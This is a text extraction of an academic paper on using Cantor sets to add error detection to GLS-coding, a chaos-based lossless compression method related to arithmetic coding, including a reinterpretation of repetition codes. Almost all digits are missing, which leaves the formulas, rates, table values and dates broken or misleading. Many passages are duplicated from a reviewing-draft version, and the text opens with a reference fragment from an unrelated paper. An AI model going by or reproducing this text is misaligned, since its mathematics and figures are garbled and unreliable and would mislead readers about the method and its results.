graph output of student achievement data based on python + pandas + matplotlib [j]. fujian computer. ( ): - . [ ] liu yuke, wang ping. statistics and graph output of student achievement data based on python + pandas + matplotlib [j]. fujian computer. ( ): - . [ ] long hu, yang hui. data analysis and visualization in the context of big data [j]. journal of kaili university. ( ): - . submitted october accepted december published january corresponding author nithin nagaraj, nithin@nias.res.in, nithin.nagaraj@gmail.com academic editor arun somani additional information and declarations can be found on page doi . /peerj-cs. copyright nagaraj distributed under creative commons cc-by . open access using cantor sets for error detection nithin nagaraj consciousness studies programme, national institute of advanced studies, bengaluru, india abstract error detection is a fundamental need in most computer networks and communication systems in order to combat the effect of noise. error detection techniques have also been incorporated with lossless data compression algorithms for transmission across communication networks. in this paper, we propose to incorporate a novel error detection scheme into a shannon optimal lossless data compression algorithm known as generalized luröth series (gls) coding. gls-coding is a generalization of the popular arithmetic coding which is an integral part of the jpeg standard for still image compression. gls-coding encodes the input message as a symbolic sequence on an appropriate d chaotic map generalized luröth series (gls) and the compressed file is obtained asthe initial valueby iterating backwards onthe map. however, in thepresence of noise, even small errors in the compressed file leads to catastrophic decoding errors owing to sensitive dependence on initial values, the hallmark of deterministic chaos. in this paper, we first show that repetition codes, the oldest and the most basic error correction and detection codes in literature, actually lie on a cantor set with a fractal dimension of n, which is also the rate of the code. inspired by this, we incorporate error detection capability to gls-coding by ensuring that the compressed file (initial value on the chaotic map) lies on a cantor set. even a -bit error in the initial value will throw it outside the cantor set, which can be detected while decoding. the rate of the code can be adjusted by the fractal dimension of the cantor set, thereby controlling the error detection performance. subjects autonomous systems, computer networks and communications, data science, mobile and ubiquitous computing, software engineering keywords error detection, error control coding, cantor sets, shannon entropy, arithmetic coding, repetition codes, gls-coding, chaos, lossless data compression introduction computers and communication systems invariably have to deal with the ill effects of noise, which can lead to errors in computation and information processing. in a landmark paper published in , richard hamming addressed this problem by introducing mathematical techniques for error detection and correction (hamming, ). since then, coding theory has burgeoned to be a field of its own right, boasting of important research and developments in the art and science of error detection and correction (lin & costello, ). error detection/correction techniques have therefore been a fundamental part of most computing systems and communication networks, typically applied on the input data after data compression (lossy/lossless) and encryption (bose, ). shannon’s separation theorem (shannon, ) states that under certain assumptions, data compression (source coding) and error protection (channel coding) can be performed how to cite this article nagaraj n. . using cantor sets for error detection. peerj comput. sci. :e http://doi.org/ . /peerj- cs. https://peerj.com mailto:nithin@nias.res.in mailto:nithin.nagaraj@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. http://doi.org/ . /peerj-cs. progressive transmission refers to the successive approximation property of the bitstream where successive bits transmitted across the channel improve the fidelity of reconstruction at the decoder. separately and independently (sequentially) while still maintaining optimality. however, in several practical scenarios, these assumptions are not met and hence there is a need for joint source channel coding. in image/video browsing and web-based applications, it is highly desirable to have the property of progressive transmission (said & pearlman, ). however, even the slightest error can wreak havoc on a progressive bitstream. hence, there is a need for incorporating error detection when decoding a compressed progressive bitstream. lossless data compression refers to the removal of redundancy in the data—a pre- requisite step in most storage and communication systems before the application of an encryption algorithm and error control coding (for error detection/correction). consider an i.i.d. binary message source s which emits ‘ ’ with probability p ( < p < ). a binary message m of length n from such a source needs to be losslessly compressed. shannon (shannon, ) showed that such a message can at best be losslessly compressed to≥h(s)·n bits on an average, where h(s) is the shannon’s entropy of the source. for an individual binary message m from such an i.i.d. source, we can compute h(·) as follows: h(m)=−plog (p)−( −p)log ( −p) bits/symbol, ( ) where p= number of zeros in mn . there are several lossless compression algorithms in literature - shannon-fano coding, huffman coding, arithmetic coding, lempel–ziv coding and others (cover & thomas, ; sayood, ). among these, arithmetic coding (rissanen & langdon, ) achieves the shannon entropy limit for increasing message lengths. arithmetic coding is used extensively in several practical applications owing to its speed, efficiency and progressive bitstream property. in fact, it is used in jpeg (taubman & marcellin, ), the international standard for still image compression, replacing the popular huffman coding which was used in the earlier jpeg (wallace, ) standard. in (nagaraj, vaidya & bhat, ), it was shown that arithmetic coding is closely related to a d non-linear chaotic dynamical system known as generalized luröth series (gls).specifically, itwas shownthat losslesscompression orencoding ofthe binarymessage m can be performed as follows. first, the message m is treated as a symbolic sequence on an appropriately chosen chaotic gls. the initial value on the gls corresponding to this symbolic sequence is computed by iterating backwards on the map. this initial value (written in binary) serves as the compressed file. for decompression, we start with this initial value (the compressed file) and iterate forwards on the (same) gls, and record the symbolic sequence. this symbolic sequence is the decoded m. such a simple lossless compression algorithm (known as gls-coding) was proved to achieve shannon’s entropy limit (nagaraj, vaidya & bhat, ). arithmetic coding turns out to be a special case of gls-coding (nagaraj, vaidya & bhat, ). unfortunately, it turns out that gls-coding (hence also arithmetic coding), having the progressive bitstream property, is very sensitive to errors. even a single bit error in the compressed file can lead to catastrophic decoding errors. this has been well documented in the data compression literature (boyd et al., ) and researchers have since been trying to enhance arithmetic coding with error detection and correction properties (anand, ramchandran & kozintsev, ; pettijohn, hoffman & sayood, ). in this work, our nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. one could alternately use the skew- binary map. there are eight possible modes of gls in this case and all are equivalent in terms of compression ratio performance (nagaraj, vaidya & bhat, ). aim is to incorporate error detection into gls-coding by using cantor set while not sacrificing much on the lossless compression ratio performance of gls-coding. as we shall demonstrate, cantor set has desirable properties that enable efficient error detection with gls-decoding. the paper is organized as follows. in ‘gls-coding and decoding’, we briefly describe gls-coding of a binary message and its sensitivity to errors. in ‘error detection using cantor set’, we explore cantor set and describe its wonderful properties that enable error detection. particularly, it is shown that repetition codes belong to a cantor set. inspired by this, we incorporate error detection into gls-coding using a cantor set in ‘incorporating error detection into gls-coding using a cantor set’ and show simulation results of the proposed method. we conclude with open challenging problems in ‘conclusions and future work’. gls-coding and decoding in this section, we shall briefly describe gls-coding first proposed by nagaraj, vaidya & bhat ( ). we are given a message m, of length l, from a binary i.i.d. source s. our aim is to losslessly compress m. to this end, we first determine the probability of zeros in m, denoted by p. we then construct the gls map tp as follows: xn+ =tp(xn)=   xn p , if ≤xn <p, −xn −p , if p≤xn < . the gls-map, also known as the skew-tent map , tp, has two intervals: [ ,p) and [p, ) which are tagged with the symbols ‘ ’ and ‘ ’ respectively. starting with any initial value x ∈[ , ), the above map tp can be applied iteratively to yield the real-valued time series {xi}. the symbolic sequence of this time series, denoted by {si}, is simply obtained by: si= { , if ≤xi <p, , if p≤xi < . given the symbolic sequence {si}, the inverse of tp is given by: t− p (yj)= { pyj, if sj = , −yj( −p), if sj = , for gls-coding, we begin by treating the given message m as a symbolic sequence{si} i=l− i= of length l on the gls tp. the goal is to obtain the initial value x ∈[ , ) which when iterated forwards on tp produces the symbolic sequence {si} (= message m). to obtain x , we begin by initializing start = . and end = . . we then determine the inverse images of start and end by iterating backwards on tp, by using t − p and starting with the last symbol sl− . at the end of the first back-iteration, we obtain start and end . we determine the inverse images of start and end (given sl− ) to determine the new interval [start ,end ). this is repeated l times to yield the final interval [startl− ,endl− ). all points within this final interval have the same symbolic sequence nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the number of bits needed to store the compressed file x approaches the entropy h asymptotically as the length of the message approaches∞. arithmetic code turns out to be using the skewed-binary map instead of the skewed- tent map. figure . gls-coding: an example. for the message m = (l = , p = . ), the above figure shows the backward-iteration from to on the gls t . . with [st art ,end ) = [ . , . ) and iterating backwards, we obtain [st art ,end ) = [ . , . ), [st art ,end ) = [ . , . ), [st art ,end ) = [ . , . ) and so on. in this figure, when we go from the symbols to , we go from [st art ,end ) = [ . , . ) to [st art ,end ) = [ . , . ) since the symbolic sequence at this iteration is . this process is repeated until we have a final interval [st artl− ,endl− ) for the entire m. given the symbolic sequence {si}, the inverse of tp is given by: t − p (y j) = { py j, if s j = , − y j( − p), if s j = , for gls-coding, we begin by treating the given message m as a symbolic sequence {si}i=l− i= of length l on the gls tp. the goal is to obtain the initial value x ∈ [ , ) which when iterated forwards on tp produces the symbolic sequence {si} (= message m). to obtain x , we begin by initializing st art = . and end = . . we then determine the inverse images of st art and end by iterating backwards on tp, by using t − p and starting with the last symbol sl− . at the end of the first back-iteration, we obtain st art and end . we determine the inverse images of st art and end (given sl− ) to determine the new interval [st art ,end ). this is repeated l times to yield the final interval [st artl− ,endl− ). all points within this final interval have the same symbolic sequence (= m = {si}). we take the mid-point x = st artl− +endl− as the compressed file. since x is a real number (between and ), we write its binary representation to the file. the number of bits needed to represent the compressed file x is ⌈−log (endl− − st artl− )⌉ bits. this is proved to be shannon optimal in (nagaraj et al., ) and arithmetic coding is shown to be a special case of gls-coding . gls-decoding is straightforward. at the decoder, given the value of p, we construct the gls (skew- tent map) tp as described earlier. given that we know x (the compressed file ), all that we need to do is iterate forwards on the map tp for l (= length of message m) iterations and output the symbolic sequence {si}. this is the decoded message and in the absence of any noise, this is exactly the same as m which was input to the encoder. as an example, consider m = (l = ). in this case, p = = . and t . is shown in fig. . with st art = . and end = . , we obtain [st art ,end ) = [ . , . ), [st art ,end ) = [ . , . ), [st art ,end ) = [ . , . ) and so on. . effect of single-bit error on gls-decoding: sensitive dependence on initial value of the map thus far, we have discussed lossless coding in the absence of any kind of noise. however, in practical applications, noise is unavoidable. if the data is in a compressed form, then it is quite likely that the the number of bits needed to store the compressed file x approaches the entropy h asymptotically as the length of the message approaches ∞. arithmetic code turns out to be using the skewed-binary map instead of the skewed-tent map. / peerj comput. sci. reviewing pdf | (cs- : : : : :new dec ) manuscript to be reviewedcomputer science figure gls-coding: an example. for the message m = (l = ,p= . ), the above figure shows the backward-iteration from to on the gls t . . with [start ,end ) = [ . , . ) and iterating backwards, we obtain [start ,end ) = [ . , . ), [start ,end ) = [ . , . ), [start ,end )=[ . , . ) and so on. in this figure, when we go from the symbols to , we go from [start ,end )=[ . , . ) to [start ,end )=[ . , . ) since the symbolic sequence at this iteration is . this process is repeated until we have a final interval [startl− ,endl− ) for the entire m. full-size doi: . /peerjcs. /fig- (=m ={si}). we take the mid-point x = startl− +endl− as the compressed file. since x is a real number (between and ), we write its binary representation to the file. the number of bits needed to represent the compressed file x is d−log (endl− −startl− )e bits. this is proved to be shannon optimal in nagaraj, vaidya & bhat ( ) and arithmetic coding is shown to be a special case of gls-coding . gls-decoding is straightforward. at the decoder, given the value of p, we construct the gls (skew-tent map) tp as described earlier. given that we know x (the compressed file), all that we need to do is iterate forwards on the map tp for l (= length of message m) iterations and output the symbolic sequence {si}. this is the decoded message and in the absence of any noise, this is exactly the same as m which was input to the encoder. as an example, consider m = (l= ). in this case, p= = . and t . is shown in fig. . with start = . and end = . , we obtain [start ,end )= [ . , . ), [start ,end )=[ . , . ), [start ,end )=[ . , . ) and so on. effect of single-bit error on gls-decoding: sensitive dependence on initial value of the map thus far, we have discussed lossless coding in the absence of any kind of noise. however, in practical applications, noise is unavoidable. if the data is in a compressed form, then it is quite likely that the decoder would be unable to decode or would decode incorrectly. even detecting whether an error has occurred helps in several communication protocols since a repeat request could be initiated. in gls-coding, the compressed file is the initial value of the symbolic sequence (the message m) on the appropriate gls. since gls is a chaotic map, it exhibits sensitive dependence on initial values, the hallmark of deterministic chaos (alligood, sauer & yorke, ). a small perturbation in the initial value will result in a symbolic sequence which nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure . effect of noise on gls-coding: (a) the first bit of the compressed file is flipped. the decoded message is very different from the actual intended message. (b) the middle bit (bit no. ) of the compressed file is flipped. the first bits are decoded without error and the remaining bits show lots of decoding error. ( p = . ,n = , , compressed file size = bits). in both cases, only part of the difference is shown. decoder would be unable to decode or would decode incorrectly. even detecting whether an error has occurred helps in several communication protocols since a repeat request could be initiated. in gls-coding, the compressed file is the initial value of the symbolic sequence (the message m) on the appropriate gls. since gls is a chaotic map, it exhibits sensitive dependence on initial values, the hallmark of deterministic chaos (alligood et al., ). a small perturbation in the initial value will result in a symbolic sequence which is uncorrelated to the original symbolic sequence after a few iterations. this means that with a very high probability, even a slight amount of noise that is added to the initial value (compressed file) will result in a wrongly decoded message (symbolic sequence), which will be very different from the actual intended message. this is demonstrated in fig. . the first bit of the compressed file is flipped and gls-decoding is performed. the difference in the decoded message from the original message is shown in fig. (a). as it can be seen, the decoded message is very different from the original message. on the other hand, if the middle bit of the compressed file is flipped then the decoded image is accurate up to bits and the remaining bits are wrongly decoded (fig. (b)). the error affects only those bits which are subsequently decoded. error detection using cantor set in gls-coding, every real number on the interval [ , ) represents an initial value (compressed file). thus, any error in the initial value will result in another real number which is also an initial value, but for an entirely different symbolic sequence (message). it represents a valid compressed file which decodes to a different message. therefore in order to detect errors, we necessarily require that when noise gets added to the initial value while transmission on the communication channel, it should result in a value that is not a valid compressed file, so that at the decoder it can be flagged for error. this necessarily implies that not all real numbers in the interval [ , ) can be valid compressed files. we need to restrict the set of valid compressed files to a smaller subset of [ , ). this subset should be uncountable and dense since it should be able to decode all possible (infinite length) messages. at the same time, it should have negligible measure (zero measure) so that when noise is added, the probability that it falls outside the set is . cantor sets provide the perfect solution. . the cantor set the well known middle-third cantor set (alligood et al., ),(strogatz, ) is a good example to illustrate this idea. all real numbers between and which do not have in their ternary expansion / peerj comput. sci. reviewing pdf | (cs- : : : : :new dec ) manuscript to be reviewedcomputer science figure effect of noise on gls-coding. (a) the first bit of the compressed file is flipped. the decoded message is very different from the actual intended message. (b) the middle bit (bit no. ) of the com- pressed file is flipped. the first , bits are decoded without error and the remaining , bits show lots of decoding error. (p= . , n = , , compressed file size= , bits). in both cases, only part of the difference is shown. full-size doi: . /peerjcs. /fig- is uncorrelated to the original symbolic sequence after a few iterations. this means that with a very high probability, even a slight amount of noise that is added to the initial value (compressed file) will result in a wrongly decoded message (symbolic sequence), which will be very different from the actual intended message. this is demonstrated in fig. . the first bit of the compressed file is flipped and gls-decoding is performed. the difference in the decoded message from the original message is shown in fig. a. as it can be seen, the decoded message is very different from the original message. on the other hand, if the middle bit of the compressed file is flipped then the decoded image is accurate up to , bits and the remaining , bits are wrongly decoded (fig. b). the error affects only those bits which are subsequently decoded. error detection using cantor set in gls-coding, every real number on the interval [ , ) represents an initial value (compressed file). thus, any error in the initial value will result in another real number which is also an initial value, but for an entirely different symbolic sequence (message). it represents a valid compressed file which decodes to a different message. therefore in order to detect errors, we necessarily require that when noise gets added to the initial value while transmission on the communication channel, it should result in a value that is not a valid compressed file, so that at the decoder it can be flagged for error. this necessarily implies that not all real numbers in the interval [ , ) can be valid compressed files. we need to restrict the set of valid compressed files to a smaller subset of [ , ). this subset should be uncountable and dense since it should be able to decode all possible (infinite length) messages. at the same time, it should have negligible measure (zero measure) so that when noise is added, the probability that it falls outside the set is . cantor sets provide the perfect solution. nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the term ‘cantor set’ is used here in a more general sense to refer to fractals that are obtained very much like the middle- third cantor set but with a different proportion (not necessarily rd) removed at every iteration. please see (strogatz, ). topological cantor sets are not self- similar. for further details, please see the references in loskot & beaulieu ( ). the cantor set the well known middle-third cantor set (alligood, sauer & yorke, ; strogatz, ) is a good example to illustrate this idea. all real numbers between and which do not have in their ternary expansion belong to this cantor set (call it c). we note down the following ‘‘paradoxical’’ aspects of cantor sets as observed in (strogatz, ): . cantor set c is ‘‘totally disconnected’’. this means that c contains only single points and no intervals. in this sense, all points in c are well separated from each other. . on the other hand, c contains no ‘‘isolated points’’. this means that every point in c has a neighbor arbitrarily close by. these two ‘‘paradoxical’’ aspects of cantor sets (not just for the middle third cantor set, but even for generalized cantor sets, as well as, topological cantor sets ) are actually very beneficial for error detection and correction. property implies that a small error will ensure that the resulting point is not in c while property ensures that we can always find the nearest point in c that can be decoded. self-similar cantor sets are fractal (their dimension is not an integer). we shall show that repetition codes, one of the oldest error detection/correction codes lie on a cantor set. repetition codes rn lie on a cantor set repetition codes are the oldest and most basic error detection and correction codes in coding theory. they are frequently used in applications where the cost and complexity of encoding and decoding are a primary concern. loskot & beaulieu ( ) provide a long list of practical applications of repetition codes. repetition codes are robust against impulsive noise and used in retransmission protocols, spread spectrum systems, multicarrier systems, infrared communications, transmit delay diversity, blast signaling, rate-matching in cellular systems, and synchronization of ultrawideband systems . thus, repetition codes are very useful in communications. they are described as follows. consider a message from a binary alphabet { , }. a repetition code rn (n> , odd integer) is a block code which assigns: → ... ︸ ︷︷ ︸ n → ... ︸ ︷︷ ︸ n . rn can correct up to n− bit errors since the minimum hamming distance of rn is n. since n is chosen to be an odd positive integer (> ), a majority count in every block of n symbols acts as a very simple but efficient decoding algorithm. the repetition code rn is a linear block code with a rate = n. we shall provide a new interpretation of rn, inspired by cantor set. start with the real line segment ( , ]. remove the middle ( − −n+ ) fraction of the set ( , ]. in the remaining two intervals, remove the same fraction and repeat this process in a recursive fashion (refer to fig. ). when this process is carried over an infinite number of times, the set that remains is a cantor set. furthermore, the binary representation of every element of the cantor set forms the codewords of rn. nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. remove middle – - n+ n= f f f f figure . repetition codes rn lie on a cantor set: recursively remove the middle ( − −n+ ) fraction. as an example, r is depicted above. the box-counting dimension of the cantor set is d = n . this is equal to the rate of the code. establishes a very important connection between the properties of the cantor set and the property of the code. incorporating error detection into gls-coding using a can- tor set having established that one of the oldest error detection/correction methods, namely repetition codes, belong to a cantor set, we shall extend this idea of using cantor set for error detection to gls-coding. first, we establish a connection between repetition codes and gls-coding. . repetition codes re-visited it is a common view to look at repetition codes as block codes. in this section, we view them as gls-coding with a forbidden symbol. we could re-interpret fig. in a different way. let the middle − −n+ interval be reserved for the forbidden symbol ‘f ’ (this symbol never occurs in the message to be encoded) and the intervals [ , −n) and [ − −n, ) correspond to the symbols ‘ ’ and ‘ ’ respectively. we treat all binary messages as symbolic sequences on this modified map and perform gls-coding, i.e. find the initial value of a given message m. for gls-coding, we are treating the alphabet { ,f, } as taking the probabilities { −n, − −n+ , −n} respectively. the resulting initial value of gls-coding is the codeword for the message and it turns out that it is the same as rn(m). thus we have interpreted rn(m) as a joint source channel code where the source has three alphabets and we are encoding messages that contain only and . by reserving a forbidden symbol ‘f ’ which is not used in encoding, all pre-images of the interval corresponding to ‘f ’ have to be removed. thus, we have effectively created the same cantor set that was referred to in the previous section. for error detection, one has to start with the initial value and iterate forwards on the modified map and record the symbolic sequence. if the symbolic sequence while decoding contains the symbol ‘f ’, then it invariably means that the initial value is not a part of the cantor set and hence not a valid codeword of rn, thereby detecting that an error has occurred. thus checking whether the initial value received belongs to the cantor set or not is used for error detection at the decoder. . gls-coding with a forbidden symbol we have presented two new ways of looking at repetition codes - ) the codewords of rn lie on a cantor set and ) coding a message is the same as performing gls-coding with a forbidden symbol reserved on the interval [ , ). the two are essentially the same because, by reserving a forbidden symbol f , we / peerj comput. sci. reviewing pdf | (cs- : : : : :new dec ) manuscript to be reviewedcomputer science figure repetition codes rn lie on a cantor set: recursively remove the middle ( − −n+ ) fraction. as an example, r is depicted above. the box-counting dimension of the cantor set is d = n . this is equal to the rate of the code. full-size doi: . /peerjcs. /fig- in order to see this, consider n= . figure shows how r is recursively constructed. if the above step is terminated at iteration k, then there remains a set of intervals whose binary expansion (of length nk) contains the codewords for all possible binary messages of length k. for example, at k = for r , we can see that there are four intervals which contains real numbers with binary expansions starting from , , and . these are the codewords for the messages , , and respectively. in the limit of this process, the set results in a cantor set of measure zero which contains codewords for all binary messages which are infinitely long. box-counting dimension of rn we noted that repetition codes rn lie on a cantor set. it is very easy to compute the box-counting dimension of this cantor set: d= limδ→ logb(δ) log( /δ) where b(δ) is the number of boxes of size δ needed to cover the set. for rn, the box-counting dimension d= n which is equal to the rate of the code. this establishes a very important connection between the properties of the cantor set and the property of the code. incorporating error detection into gls-coding using a cantor set having established that one of the oldest error detection/correction methods, namely repetition codes, belong to a cantor set, we shall extend this idea of using a cantor set for error detection to gls-coding. first, we establish a connection between repetition codes and gls-coding. repetition codes re-visited it is a common view to look at repetition codes as block codes. in this section, we view them as gls-coding with a forbidden symbol. nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. we could re-interpret fig. in a different way. let the middle − −n+ interval be reserved for the forbidden symbol ‘ f’ (this symbol never occurs in the message to be encoded) and the intervals [ , −n) and [ − −n, ) correspond to the symbols ‘ ’ and ‘ ’ respectively. we treat all binary messages as symbolic sequences on this modified map and perform gls-coding, i.e., find the initial value of a given message m. for gls-coding, we are treating the alphabet { ,f, } as taking the probabilities { −n, − −n+ , −n} respectively. the resulting initial value of gls-coding is the codeword for the message and it turns out that it is the same as rn(m). thus, we have interpreted rn(m) as a joint source channel code where the source has three alphabets and we are encoding messages that contain only and . by reserving a forbidden symbol ‘f’ which is not used in encoding, all pre-images of the interval corresponding to ‘f’ have to be removed. thus, we have effectively created the same cantor set that was referred to in the previous section. for error detection, one has to start with the initial value and iterate forwards on the modified map and record the symbolic sequence. if the symbolic sequence while decoding contains the symbol ‘f’, then it invariably means that the initial value is not a part of the cantor set and hence not a valid codeword of rn, thereby detecting that an error has occurred. thus checking whether the initial value received belongs to the cantor set or not is used for error detection at the decoder. gls-coding with a forbidden symbol we have presented two new ways of looking at repetition codes—( ) the codewords of rn lie on a cantor set and ( ) coding a message is the same as performing gls-coding with a forbidden symbol reserved on the interval [ , ). the two are essentially the same because, by reserving a forbidden symbol f, we have effectively created a cantor set on which all the codewords lie. but the fact that we can view rn as gls-codes enables us to see them as joint source channel codes for the source with alphabets { ,f, } and with probability distribution { −n, − −n+ , −n} respectively. the natural question to ask is whether we can use the same method for a different probability distribution of and . the answer is positive. instead of reserving a forbidden symbol f of length − −n+ , we could chose any arbitrary value � > for the forbidden symbol. the value of � determines the amount of redundancy that is going to be available for error detection/correction. it controls the fractal dimension of the cantor set and hence the rate of the code. as � increases, error detection/correction property improves at the cost of a slight reduction in compression ratio (note that the compression is still lossless, but no longer shannon optimal). the probability of the symbol ‘ ’ is p, but only ( −�)p is allocated on the interval [ , ). similarly, for the symbol ‘ ’: ( −�)( −p) is allocated. this single parameter � can be tuned for trade-off between error control and lossless compression ratio. we shall show that a very small value of � is sufficient for detecting errors without significantly increasing the compressed file size. for encoding, as before, the binary message is treated as a symbolic sequence on the modified gls with the forbidden symbol ‘ f’ and the initial value is determined. the nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. initial value which is now on the cantor set is the compressed file which is stored and/or transmitted to the decoder. error detection with gls-decoding the decoder is the same as before except that we now have error detection capability. if the forbidden symbol ‘ f’ is encountered during gls decoding (this can happen only if noise corrupts the initial value/compressed file and throws it outside the cantor set), then it is declared that an error has been detected. the decoder can then request the encoder to re-transmit the compressed file as is done in several protocols (chou & ramchandran, ). however, this scheme does not correct the error. it is quite possible that the noise is such that the initial value gets modified into another value which also happens to fall inside the cantor set, in which case the decoder will not be able to detect the error (and thus we end up wrongly decoding the message). but, the probability of this occurring is very small (it is zero in the case of messages having infinite length since the measure of the cantor set is zero). for finite length messages, the probability of such an event is given by the measure of the set of codewords (which is non-zero). in the following section, we perform rigorous experimental tests of the proposed approach. simulation results three different values of � (� = . , � = . , � = . ) for the length of the interval corresponding to the forbidden symbol ‘ f’ were used. the amount of redundancy that needs to be added is easy to determine. by introducing the forbidden symbol of length �, the valid symbols occupy a sub-interval of length −�. thus, each time a symbol with probability p is encoded, −log (( −�)p) bits will be spent, whereas only −log (p) bits would have been spent without the forbidden symbol. thus, the amount of redundancy is r(�)=−log (( −�)p)+log (p)=−log ( −�) bits/symbol. for n symbols, this would be n ·r(�) bits rounded to the nearest highest integer. thus the rate of the code will be: rate = +r(�) = −log ( −�) . ( ) as expected, this is equal to the box-counting dimension of the cantor set. thus, by plugging in �= − −n+ in eq. ( ), we obtain the rate of the repetition codes as n. we introduced a single bit error (one bit is flipped in the entire compressed file) towards the end of the compressed file for binary i.i.d. sources (p= . , . ). note that, it is much more difficult to detect errors if they happen towards the end of the compressed file than if it occurred in the beginning of the file. this is because, any error can only affect decoding for subsequent bits and if the error was towards the end-of-file (eof), not many bits are available to catch it. remember that the cantor set (having zero measure) is obtained only after an infinite number of iterations. since we are terminating after a finite number of iterations, we don’t strictly get a cantor set. in other words, the set that remains when we terminate after a finite number of iterations is an approximation to the cantor set and it contains points which would have been discarded if we had continued iterating. the single-bit errors closer to the eof thus decode to points which are not discarded because of this approximation (as we run out of iterations). these errors survive and go undetected. nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. it should be noted that errors introduced in the beginning of the compressed bitstream were always detected. table gls-coding with forbidden symbol: redundancy (n = , , cfs, compressed file size). cfs �= (bits) � = . � = . � = . p n ·r(� ) (bits) cfs (bits) n ·r(� ) (bits) cfs n ·r(� ) (bits) cfs (bits) . , , , , . , , , , table gls-decoding with forbidden symbol: error detection (p= . ). eof stands for ‘end-of-file’. location of single bit-error introduced number of error events � = . � = . � = . detected undetected detected undetected detected undetected eof to eof− eof− to eof− eof− to eof− eof− to eof− total table gls-decoding with forbidden symbol: error detection (p= . ). eof stands for ‘end-of-file’. location of single bit-error introduced number of error events � = . � = . � = . detected undetected detected undetected detected undetected eof to eof− eof− to eof− eof− to eof− eof− to eof− total in our simulations, the location of the single bit error was varied from the last bit to the th bit from end-of-file. thus, the total number of single-bit error events introduced in the compressed bitstream is for each setting of �. this way, we can test the proposed method under the worst scenario . table shows the amount of redundancy owing to the allocation of the forbidden symbol. tables and shows the performance of the method for p= . and p= . . as expected, higher values of � are able to detect more errors, but at the cost of increased compressed file size. table shows the efficiency of the method. up to % of single bit errors introduced at the tail of the compressed file are detected by a modest increase in the redundancy (up to . %). it should be noted that errors introduced in the beginning of the compressed file can be very easily detected by the proposed method. nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table gls-coding with forbidden symbol: efficiency. p % of errors detected � = . � = . � = . . . % . % . % . . % . % . % arithmetic coding with a forbidden symbol: prior work the idea of using a forbidden symbol into arithmetic coding was first introduced by boyd et al. ( ). it was subsequently studied by chou & ramchandran ( ), grangetto & cosman ( ), anand, ramchandran & kozintsev ( ), pettijohn, hoffman & sayood ( ) and bi, hoffman & sayood ( ). however, the approach that is taken in this paper is unique and entirely motivated by a non-linear dynamical systems approach, through the wonderful properties of cantor sets. we are thus able to justify why the method actually works. to the best of our knowledge, none of the earlier researchers have made this close connection between error detection/correction for repetition codes or arithmetic coding and cantor sets. this work paves the way for future research on error correction using fractals/cantor sets and potentially a host of new efficient techniques using cantor sets could be designed. conclusions and future work in this work, we have provided a novel application of cantor sets for incorporating error detection into a lossless data compression algorithm (gls-coding). cantor sets have paradoxical properties that enable error detection and correction. repetition codes are an example of codewords on a self-similar cantor set which can detect and correct errors. by reserving a forbidden symbol on the interval [ , ), we can ensure that the codewords for gls-coding lie on a cantor set and thereby detect errors while simultaneously gls- decoding (thus preserving progressive transmission property), and without significantly increasing the compressed file size. this approach can be applied to any mode of gls and generalizable to larger alphabets. however, we do not know whether other efficient error control codes can be similarly designed using such cantor sets (or other fractals in higher dimensions) and whether we can exploit the structure of the cantor set to perform efficient error correction. these are important research directions worth exploring in the future. acknowledgements the author expresses sincere thanks to prabhakar g. vaidya for introducing him to the fascinating field of non-linear dynamics/chaos, cantor sets and fractals, and to william a. pearlman for introducing him to the equally exciting field of data compression. nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this work was supported by tata trusts. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: tata trusts. competing interests there are no competing interests. author contributions • nithin nagaraj conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: matlab code is available in a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references alligood kt, sauer td, yorke ja. . chaos. new york: springer. anand r, ramchandran k, kozintsev iv. . continuous error detection (ced) for reliable communication. ieee transactions on communications ( ): – doi . / . . bi d, hoffman mw, sayood k. . state machine interpretation of arithmetic codes for joint source and channel coding. in: data compression conference, . dcc . proceedings. ieee, – doi . /dcc. . . bose r. . information theory, coding and cryptography. second edition. new delhi: tata mcgraw-hill publishing company limited. boyd c, cleary jg, irvine sa, rinsma-melchert i, witten ih. . integrating error detection into arithmetic coding. ieee transactions on communications ( ): – doi . / . . chou j, ramchandran k. . arithmetic coding-based continuous error detection for efficient arq-based image transmission. ieee journal on selected areas in communications ( ): – doi . / . . nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / . http://dx.doi.org/ . /dcc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. cover tm, thomas ja. . elements of information theory. hoboken: john wiley & sons. grangetto m, cosman p. . map decoding of arithmetic codes with a forbidden symbol. in: proc. of acivs , ghent, belgium, vol. . hamming rw. . error detecting and error correcting codes. bell system technical journal ( ): – doi . /j. - . .tb .x. lin s, costello dj. . error control coding: fundamentals and applications. englewood cliffs: prentice-hall, 